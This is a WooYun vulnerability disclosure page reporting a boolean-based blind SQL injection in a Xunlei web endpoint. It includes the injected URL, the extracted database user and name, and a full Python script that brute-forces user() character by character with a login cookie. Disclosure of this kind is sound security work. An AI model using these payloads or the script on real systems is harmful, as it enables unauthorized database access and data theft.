当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141592

漏洞标题:迅雷某站存在SQL盲注漏洞

相关厂商:迅雷

漏洞作者: 星明月稀

提交时间:2015-09-16 16:14

修复时间:2015-10-31 17:50

公开时间:2015-10-31 17:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

迅雷某站存在SQL盲注漏洞

详细说明:

问题点,boolean-based blind :

http://dy.niu.xunlei.com/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&queryTime=7_day) and 1=1 and (1=1&_=1442386855486


(1)1=1

1=1.png


(2)1=111

1=111.png


(3)length(user())=18

length(user()).png

漏洞证明:

猜解

user():yeyouser@10.1.3.40


database(): niux_jifen


附脚本,需带入迅雷账户登录cookie:

#encoding=utf-8
import httplib,time,string,sys,urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
'Cookie' : '***'
}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print '[%s]Start to retrive MySQL User():' % time.strftime('%H:%M:%S', time.localtime())
user = ''
base_url = "/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&_=1442386855486&"
for i in range(1,19):
for payload in payloads:
conn = httplib.HTTPConnection('dy.niu.xunlei.com', timeout=6)
#s = "cid=16 AND ascii(mid(user()from(%s)for(1)))=%s" % (i, ord(payload))
s = "queryTime=7_day)+and+ascii(mid(user()from(%s)for(1)))=%s+and+(1=1" % (i,ord(payload))
conn.request(method='GET',url = base_url + s,headers=headers)
html_doc = conn.getresponse().read().decode('utf-8')
conn.close()
if html_doc.find(u'积分商城') > 0: # True
user += payload
sys.stdout.write('\r[Retriving]' + user)
sys.stdout.flush()
break
else:
print '.',
print '\n[Done]MySQL user() is ' + user
print time.strftime('%H:%M:%S', time.localtime())

修复方案:

过滤下下!

版权声明:转载请注明来源 星明月稀@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-16 17:49

厂商回复:

感谢反馈!

最新状态:

暂无